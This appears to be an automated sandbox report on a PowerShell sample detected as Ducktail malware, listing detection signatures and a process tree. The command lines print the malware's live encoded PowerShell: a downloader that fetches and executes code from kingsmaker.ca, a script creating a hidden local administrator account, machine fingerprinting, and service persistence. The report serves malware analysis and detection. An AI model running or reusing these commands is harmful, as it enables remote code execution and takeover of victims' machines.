Edit tour

Windows Analysis Report
kingsmaker_6.ca.ps1

Overview

General Information

Sample name:	kingsmaker_6.ca.ps1
Analysis ID:	1565058
MD5:	5705390f445a1b38b4c19461d81a9237
SHA1:	fa9112a883c4fc8e4eb0b425e2c7462c6fee3877
SHA256:	2a5101990c3fbe7274c5bf8bd72ba0f2c1d839eac121858602843f7702728015
Infos:

Detection

Ducktail

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Ducktail

Allows multiple concurrent remote connection

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Modifies security policies related information

Potential dropper URLs found in powershell memory

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: PowerShell Base64 Encoded WMI Classes

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64native

powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 6124 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 6280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 7896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

AcroRd32.exe (PID: 8264 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf" MD5: 0F4FB7ADA3C27236864D008A1687AD8D)

RdrCEF.exe (PID: 8548 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)

RdrCEF.exe (PID: 8724 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)

cmd.exe (PID: 7160 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5936 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

svczHost.exe (PID: 9708 cmdline: C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca MD5: EB57894A8FF610DF55C97E427D0DDD7B)

conhost.exe (PID: 9716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 9776 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 9840 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 9928 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

powershell.exe (PID: 9848 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 9864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 10032 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 10040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7776 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 5560 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 9484 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 3364 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1540 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 2744 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1368 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

